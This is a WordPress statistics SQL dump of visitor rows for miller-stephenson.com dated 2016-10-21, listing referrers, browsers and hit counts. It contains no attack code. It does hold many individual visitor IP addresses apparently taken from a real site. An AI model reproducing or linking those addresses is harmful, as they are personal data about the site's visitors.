INSERT INTO `wp_statistics_visitor` VALUES (8958, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '197.49.214.153', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8959, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '108.217.151.123', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8960, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '24.230.194.21', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8961, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.104.49.216', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8962, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '180.191.151.13', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8963, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.233.217.133', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8964, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '5.36.178.63', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8965, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '185.156.181.232', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8966, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '104.244.231.175', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8967, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '31.9.158.61', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8968, '2016-10-21', 'https://www.miller-stephenson.com/my-account/', 'MSIE', 'Windows', '6.0', '', '173.208.249.117', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8969, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '1.162.47.248', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8970, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '70.123.210.255', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8971, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '89.165.180.135', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8972, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '203.160.184.67', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8973, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.228.232.5', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8974, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '94.189.251.8', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8975, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '97.80.188.57', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8976, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '178.255.151.130', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8977, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '83.223.172.65', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8978, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '61.94.84.195', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8979, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '216.66.91.23', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8980, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '5.31.27.89', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8981, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '202.150.189.229', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8982, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '83.49.40.76', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8983, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '24.105.204.69', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8984, '2016-10-21', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '91.121.161.167', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8985, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '96.225.32.156', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8986, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '49.207.62.155', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8987, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '31.165.212.13', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8988, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '202.160.20.112', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8989, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.218.252.172', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8990, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.15.250.11', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8991, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '177.157.127.125', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8992, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '81.164.231.26', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8993, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '200.82.141.75', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8994, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '87.220.119.238', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8995, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.29.214.230', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8996, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '67.244.29.89', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8997, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '183.87.106.126', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8998, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '177.85.201.58', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8999, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '196.217.38.144', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9000, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '78.155.39.80', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9001, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '186.89.191.183', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9002, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '50.185.237.145', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9003, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '91.135.84.145', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9004, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.38.186.85', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9005, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.0.0.162', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9006, '2016-10-21', 'https://www.google.com/', 'Chrome', 'Macintosh', '54.0.2840.59', '', '129.210.115.104', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9007, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '173.82.72.154', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9008, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.238.88.135', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9009, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '177.201.230.142', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9010, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '87.49.175.167', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9011, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '76.116.141.0', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9012, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.205.101.176', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9013, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '95.68.106.147', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9014, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '181.41.37.206', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9015, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '51.36.28.184', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9016, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '197.0.249.88', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9017, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '92.98.152.123', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9018, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '85.7.64.234', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9019, '2016-10-21', 'https://www.google.ca/', 'Firefox', 'Windows', '49.0', '', '132.246.142.93', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9020, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '109.65.161.47', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9021, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '125.60.156.144', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9022, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '45.117.34.4', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9023, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '197.251.171.57', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9024, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '85.65.116.219', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9025, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.48.108.238', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9026, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '32.218.123.55', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9027, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '64.219.119.80', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9028, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '154.241.57.162', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9029, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '24.45.125.204', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9030, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '195.54.168.213', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9031, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '175.32.177.228', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9032, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '65.29.117.59', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9033, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '154.126.169.116', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9034, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '73.77.173.45', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9035, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '217.83.193.208', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9036, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '24.12.211.143', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9037, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '37.26.97.175', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9038, '2016-10-21', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '132.3.33.78', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9039, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '197.87.79.168', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9040, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '77.69.166.155', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9041, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '178.193.123.30', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9042, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '86.107.117.14', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9043, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '81.233.85.63', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9044, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '85.240.13.62', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9045, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '213.112.118.14', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9046, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '188.247.16.89', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9047, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '175.143.217.152', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9048, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.141.185.134', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9049, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '49.244.43.105', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9050, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '1.23.6.39', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9051, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '218.50.247.239', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9052, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '187.204.240.143', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9053, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '202.3.82.179', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9054, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '217.168.188.140', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9055, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '71.209.165.13', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9056, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '191.101.94.31', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9057, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '131.0.116.102', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9058, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '84.108.194.218', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9059, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '213.211.36.156', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9060, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '174.0.48.122', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9061, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '152.173.197.32', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9062, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '177.35.116.72', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9063, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '196.184.166.115', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9064, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '110.20.200.132', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9065, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '123.255.14.249', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9066, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '117.197.237.6', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9067, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '23.116.230.174', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9068, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '174.124.57.48', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9069, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '186.221.79.221', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9070, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '94.140.93.32', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9071, '2016-10-21', 'https://search.yahoo.co.jp/search;_ylt=A2RAyIABUQlYLgIA0WQDdNt7?p=%E3%82%AF%E3%83%A9%E3%82%A4%E3%83%88%E3%82%AF%E3%82%B9%E3%80%80157FSH&search.x=1&fr=top_ga1_sa&tid=top_ga1_sa&ei=UTF-8&aq=2&oq=&afs=', 'MSIE', 'Windows', '11.0', '', '218.222.199.240', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9072, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '94.230.156.12', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9073, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '201.159.11.82', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9074, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '49.147.114.255', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9075, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '119.246.224.109', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9076, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '85.68.166.13', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9077, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '46.248.81.72', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9078, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '188.77.161.246', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9079, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '189.149.111.74', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9080, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '203.174.43.114', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9081, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '90.196.176.10', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9082, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '186.146.39.95', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9083, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.133.125.91', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9084, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.217.113.16', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9085, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '24.38.132.110', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9086, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '28.0.1500.71', '', '62.210.75.243', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9087, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '187.159.78.183', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9088, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '189.5.224.10', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9089, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '197.211.32.244', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9090, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '66.111.118.107', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9091, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '84.90.170.145', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9092, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '46.1.15.142', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9093, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '173.17.158.170', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9094, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '80.242.33.35', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9095, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '1.225.0.20', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9096, '2016-10-21', 'https://www.miller-stephenson.com/', 'Chrome', 'Macintosh', '39.0.2171.99', '', '104.168.85.117', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9097, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '98.217.172.244', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9098, '2016-10-21', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '104.168.85.117', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9099, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '92.241.100.243', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9100, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '24.246.0.61', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9101, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.229.121.68', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9102, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '2.98.51.10', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9103, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '46.116.62.218', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9104, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '189.232.158.230', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9105, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '76.66.153.138', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9106, '2016-10-21', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '176.58.115.37', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9107, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '37.106.176.139', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9108, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '151.30.229.186', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9109, '2016-10-21', 'https://globalwits.globalsou.com/crawl/searchResult.asp?id=55922', 'Chrome', 'Windows', '45.0.2454.101', '', '27.223.28.58', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9110, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '71.60.189.209', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9111, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '121.214.43.99', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9112, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '108.85.187.162', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9113, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '93.58.237.140', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9114, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '185.120.211.130', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9115, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '143.137.80.41', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9116, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '109.67.171.218', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9117, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '173.252.20.128', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9118, '2016-10-21', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '50.169.26.7', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9119, '2016-10-21', 'https://www.google.ca/', 'Safari', 'iPhone', '10.0', '', '199.119.233.249', '000', 5, 0); 
